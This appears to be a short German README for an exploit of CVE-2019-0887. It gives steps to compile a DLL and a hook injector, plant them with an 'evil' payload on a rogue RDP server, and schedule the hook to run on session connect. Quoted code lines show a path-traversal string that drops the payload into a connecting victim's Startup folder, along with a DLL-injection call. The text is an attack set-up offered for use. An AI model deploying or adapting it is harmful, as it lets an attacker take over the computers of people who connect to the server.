
exp für CVE-2019-0887
Kompiliere die CVE-2019-0887, benenne sie in winhlp.dll um
Kompiliere den Install_Hook, benenne ihn in hook.exe um
Vorsicht, sie müssen mit x64 kompiliert werden
Lege sie dann einfach so in das böse System
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
Falls jemand den Pfad ändern möchte, hier ist der Punkt
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
Vielleicht verwende taskschd.msc, um einen Aufgabenplan zu erstellen, setze einen Trigger "Bei Verbindung mit Benutzersitzung" und setze den Dateipfad von hook.exe.
Warte, dass jemand sich mit meinem bösen System verbindet, etwas kopiert, und pwn...
Tipps: Warum nicht DLL-Hijacking verwenden?